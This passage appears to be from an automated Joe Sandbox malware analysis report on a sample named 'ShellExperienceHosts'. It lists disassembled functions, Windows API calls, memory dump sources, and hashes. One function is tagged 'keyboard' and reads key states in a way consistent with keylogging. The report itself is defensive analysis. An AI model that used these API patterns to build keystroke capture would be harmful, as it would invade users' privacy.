                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Profile$CopyCursorDragDropEmptyH_prolog3H_prolog3_Inflate
                                                                            • String ID:
                                                                            • API String ID: 1837043813-0
                                                                            • Opcode ID: 41979d252a3fcca6624f3d9108ce65f34a9071211a98bd7fed268449552fae30
                                                                            • Instruction ID: 71da99eb2e02041446065c40590249cc20d6af0e5f4e93a33abfab0e96ae1643
                                                                            • Opcode Fuzzy Hash: 41979d252a3fcca6624f3d9108ce65f34a9071211a98bd7fed268449552fae30
                                                                            • Instruction Fuzzy Hash: E4313971A016199FDF11DFE5CA88DED7BB9FF49348B404029E815AB744CB34AE0ACB91
                                                                            Function 6C7ECFD1 Relevance: 10.6, APIs: 7, Instructions: 74keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 6C7ECFF2
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 6C7ED010
                                                                            • GetKeyboardState.USER32(?,?,?,6C8F4D88), ref: 6C7ED042
                                                                            • GetKeyboardLayout.USER32(?), ref: 6C7ED055
                                                                            • MapVirtualKeyW.USER32(?,00000000), ref: 6C7ED060
                                                                            • ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000001,00000000), ref: 6C7ED07B
                                                                            • CharUpperW.USER32(?,?,?,6C8F4D88), ref: 6C7ED091
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: State$AsyncKeyboard$CharLayoutUnicodeUpperVirtual
                                                                            • String ID:
                                                                            • API String ID: 298839909-0
                                                                            • Opcode ID: a327034af1dd9e21df7de60280b89005a5eed67dc3d101bbfaba316d19ed0ca1
                                                                            • Instruction ID: 392db7d9c9cfc5d1f1d56e4d7ca53083d2c90b4ea150b806ca549d8fc587af57
                                                                            • Opcode Fuzzy Hash: a327034af1dd9e21df7de60280b89005a5eed67dc3d101bbfaba316d19ed0ca1
                                                                            • Instruction Fuzzy Hash: A921D771600109ABDB209B64CE49FEDB7BCAF69748F440075F141E7480EFB0A985DB94
                                                                            Function 6C6F4AA3 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Destroy$AcceleratorH_prolog3ParentTable
                                                                            • String ID:
                                                                            • API String ID: 2502036937-0
                                                                            • Opcode ID: fab37676c349a731023d5f0eec5e626b281cdb88d7937b8cb81e409faaa263cc
                                                                            • Instruction ID: 213c502b0439a0038a66335ad2e70b645fdb56cc266d94c03b2dafe9c0b0c4ae
                                                                            • Opcode Fuzzy Hash: fab37676c349a731023d5f0eec5e626b281cdb88d7937b8cb81e409faaa263cc
                                                                            • Instruction Fuzzy Hash: 792190716003059BDB119F61CA88BAE76B6BF86318F150518E866A7E42DB70E806CB6C
                                                                            Function 6C7A0CA5 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RealChildWindowFromPoint.USER32(?,?,?,?,?), ref: 6C7A0CC9
                                                                            • ClientToScreen.USER32(?,?), ref: 6C7A0CE3
                                                                            • GetWindow.USER32(?,00000005), ref: 6C7A0D35
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ChildClientFromPointRealScreen
                                                                            • String ID:
                                                                            • API String ID: 2518355518-0
                                                                            • Opcode ID: d7bcc8584ddd98870bffc851adb5c9542c327b20dadad8d52141b8ec9947e60a
                                                                            • Instruction ID: b2936885d5caa6b39f59e2c01f70097e3ab142aa0d37a15bca2276f2ef6c89b7
                                                                            • Opcode Fuzzy Hash: d7bcc8584ddd98870bffc851adb5c9542c327b20dadad8d52141b8ec9947e60a
                                                                            • Instruction Fuzzy Hash: 4B118771A0165AABCF11DFA4C909AEF77B8AF4A305B104635F412E3140DB34ED46CB91
                                                                            Function 6C73C97E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 6C73C995
                                                                            • FindResourceW.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT,?,?,?,?,?,6C6E5A65,?,?), ref: 6C73C9BD
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,?,?,?,6C6E5A65,?,?), ref: 6C73C9CF
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,6C6E5A65,?,?), ref: 6C73C9DB
                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,?,6C6E5A65,?,?), ref: 6C73C9E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeofWindow
                                                                            • String ID: AFX_DIALOG_LAYOUT
                                                                            • API String ID: 2582447065-2436846380
                                                                            • Opcode ID: a0c93df6ab57e8ae0f06f38d5362ca9c438e269f02cbc1ddf1c7b7d35f15dee5
                                                                            • Instruction ID: e1e1118f85c36be5452ff3ce3f94635dcf289ca215572e90395020d7ca4941ec
                                                                            • Opcode Fuzzy Hash: a0c93df6ab57e8ae0f06f38d5362ca9c438e269f02cbc1ddf1c7b7d35f15dee5
                                                                            • Instruction Fuzzy Hash: 4811C271700234AFEB21AB748D4CE6B76BCFB452DAB100635A80AC2601EBB4DC04C7A2
                                                                            Function 6C7844D5 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3
                                                                            • String ID: AQUA_$BLACK_$BLUE_$IDX_OFFICE2007_STYLE$SILVER_
                                                                            • API String ID: 431132790-2717817858
                                                                            • Opcode ID: b63a5371c0edaa0231cf03e0405c1b94073674d9d11958037c353420440cba8a
                                                                            • Instruction ID: a59d6ffb438fd6088b6095bd01b48aa49c8cad95a7b41772d56e8f084ae2b1ec
                                                                            • Opcode Fuzzy Hash: b63a5371c0edaa0231cf03e0405c1b94073674d9d11958037c353420440cba8a
                                                                            • Instruction Fuzzy Hash: C91108729020099BCB00DFA8CB15AFD7779AF81318F144225A5219BFC0DB70DA09D729
                                                                            Function 100097E2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,10017C00,00000008,100098EA,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C), ref: 100097F3
                                                                            • __lock.LIBCMT ref: 10009827
                                                                              • Part of subcall function 1000C144: __mtinitlocknum.LIBCMT ref: 1000C15A
                                                                              • Part of subcall function 1000C144: __amsg_exit.LIBCMT ref: 1000C166
                                                                              • Part of subcall function 1000C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,100099BA,0000000D,10017C28,00000008,10009AB1,00000000,?,10007711,00000000,10017B60,00000008,10007776,?), ref: 1000C16E
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 10009834
                                                                            • __lock.LIBCMT ref: 10009848
                                                                            • ___addlocaleref.LIBCMT ref: 10009866
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                            • String ID: KERNEL32.DLL
                                                                            • API String ID: 637971194-2576044830
                                                                            • Opcode ID: 2fd8a646381f8c1273ec5aa8b514110e131a74dbccaeb09b5e4df53804c3848b
                                                                            • Instruction ID: 89763b3cff33ace5d26e8772c174daa1abf762224351bfae7625883661725aa5
                                                                            • Opcode Fuzzy Hash: 2fd8a646381f8c1273ec5aa8b514110e131a74dbccaeb09b5e4df53804c3848b
                                                                            • Instruction Fuzzy Hash: 1A016D75804B00DFE320DF69C84574ABBE0EF41361F14890EE49A9B3A5CBB4F680CB55
                                                                            Function 6C7A2DFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E463F,?,?,?,?), ref: 6C7A2E11
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 6C7A2E21
                                                                            • EncodePointer.KERNEL32(00000000,?,?,6C6E463F,?,?,?,?), ref: 6C7A2E2A
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6E463F,?,?,?,?), ref: 6C7A2E38
                                                                            Strings
                                                                            • RegisterApplicationRecoveryCallback, xrefs: 6C7A2E1B
                                                                            • kernel32.dll, xrefs: 6C7A2E0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: RegisterApplicationRecoveryCallback$kernel32.dll
                                                                            • API String ID: 2061474489-202725706
                                                                            • Opcode ID: 328c32c6300f79e7d93ca85fdd2d0712b28d74609d30b888f5262f120612de2a
                                                                            • Instruction ID: d85627b3e983572b52a919417ceec0edf9454a8f32dd46d9779725550792049b
                                                                            • Opcode Fuzzy Hash: 328c32c6300f79e7d93ca85fdd2d0712b28d74609d30b888f5262f120612de2a
                                                                            • Instruction Fuzzy Hash: 3DF06D3174521AAB8F226FA69E0C85B3F78AB467997000631FD19D6620C734D852DBE1
                                                                            Function 6C7A2F71 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(shell32.dll,?,?,6C7A215D,?,00000000,6C89BA48,00000000,?,6C6DC013,?), ref: 6C7A2F83
                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 6C7A2F93
                                                                            • EncodePointer.KERNEL32(00000000,?,6C7A215D,?,00000000,6C89BA48,00000000,?,6C6DC013,?), ref: 6C7A2F9C
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C7A215D,?,00000000,6C89BA48,00000000,?,6C6DC013,?), ref: 6C7A2FAA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                            • API String ID: 2061474489-2320870614
                                                                            • Opcode ID: 262083d05b0d8865f8c3ca78c6fe9d976b732c02050c36eb5cf65e5086e45405
                                                                            • Instruction ID: afb0bded4c311854c77d7a1cb7a93bf612ba08442158381beac943ce4b9941ca
                                                                            • Opcode Fuzzy Hash: 262083d05b0d8865f8c3ca78c6fe9d976b732c02050c36eb5cf65e5086e45405
                                                                            • Instruction Fuzzy Hash: FEF09A3170521AAB8F215FA69E0C85A3BB9AB4A3993010631FC19E6620C734DC52DBE1
                                                                            Function 6C7A2DA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E4623,?,?), ref: 6C7A2DB2
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 6C7A2DC2
                                                                            • EncodePointer.KERNEL32(00000000,?,?,6C6E4623,?,?), ref: 6C7A2DCB
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6E4623,?,?), ref: 6C7A2DD9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: RegisterApplicationRestart$kernel32.dll
                                                                            • API String ID: 2061474489-1259503209
                                                                            • Opcode ID: 693e77fd679a60cf80b7a926785061e41e15285ca205353ea74b8b8da2bf7e8b
                                                                            • Instruction ID: 3f7d396cabf4ab44966485080905f086a15ada1dcf47711a55a43bf80a553232
                                                                            • Opcode Fuzzy Hash: 693e77fd679a60cf80b7a926785061e41e15285ca205353ea74b8b8da2bf7e8b
                                                                            • Instruction Fuzzy Hash: 86F08232741216AB9F215BA69E0C96A3B789F8679A7000632FC09E6615DB34DC42DBE4
                                                                            Function 6C7A2F15 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(user32.dll,?,?,6C6F32AF,00000323,00000001,?,00000004,6C6D4B05), ref: 6C7A2F27
                                                                            • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 6C7A2F37
                                                                            • EncodePointer.KERNEL32(00000000,?,?,6C6F32AF,00000323,00000001,?,00000004,6C6D4B05), ref: 6C7A2F40
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6F32AF,00000323,00000001,?,00000004,6C6D4B05), ref: 6C7A2F4E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                            • API String ID: 2061474489-2498399450
                                                                            • Opcode ID: ecf3974197f3c817846872f1df3346f8227e5347ed5f3de94580040f253f85fe
                                                                            • Instruction ID: 736b116d7fb3df7308dfcb193daef15e2ab3b65b4010f2b9e854b9ab7663c196
                                                                            • Opcode Fuzzy Hash: ecf3974197f3c817846872f1df3346f8227e5347ed5f3de94580040f253f85fe
                                                                            • Instruction Fuzzy Hash: FEF05E31705215EB8B316BA68E0CC1A3B78EB4B6993010632FC1AD2610D734D812DBE5
                                                                            Function 6C7A2E64 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E465E,00000000), ref: 6C7A2E76
                                                                            • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 6C7A2E86
                                                                            • EncodePointer.KERNEL32(00000000,?,?,6C6E465E,00000000), ref: 6C7A2E8F
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6E465E,00000000), ref: 6C7A2E9D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: ApplicationRecoveryInProgress$kernel32.dll
                                                                            • API String ID: 2061474489-2899047487
                                                                            • Opcode ID: 171c04c3355da36309ff3ae6196a68866136c9bfcd0202cbcd0d955889e4d118
                                                                            • Instruction ID: 30a1cdab3487de280a17e66408081f86be65b5329b618792a98e2f2e5f887b32
                                                                            • Opcode Fuzzy Hash: 171c04c3355da36309ff3ae6196a68866136c9bfcd0202cbcd0d955889e4d118
                                                                            • Instruction Fuzzy Hash: 5AF0A731B45215AB8B316BA59A0C81B3A7C5B8A79A3000631FC19D7710D734DC92CBE1
                                                                            Function 6C7A2EC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E46A1,00000001), ref: 6C7A2ED2
                                                                            • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 6C7A2EE2
                                                                            • EncodePointer.KERNEL32(00000000,?,6C6E46A1,00000001), ref: 6C7A2EEB
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6E46A1,00000001), ref: 6C7A2EF9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
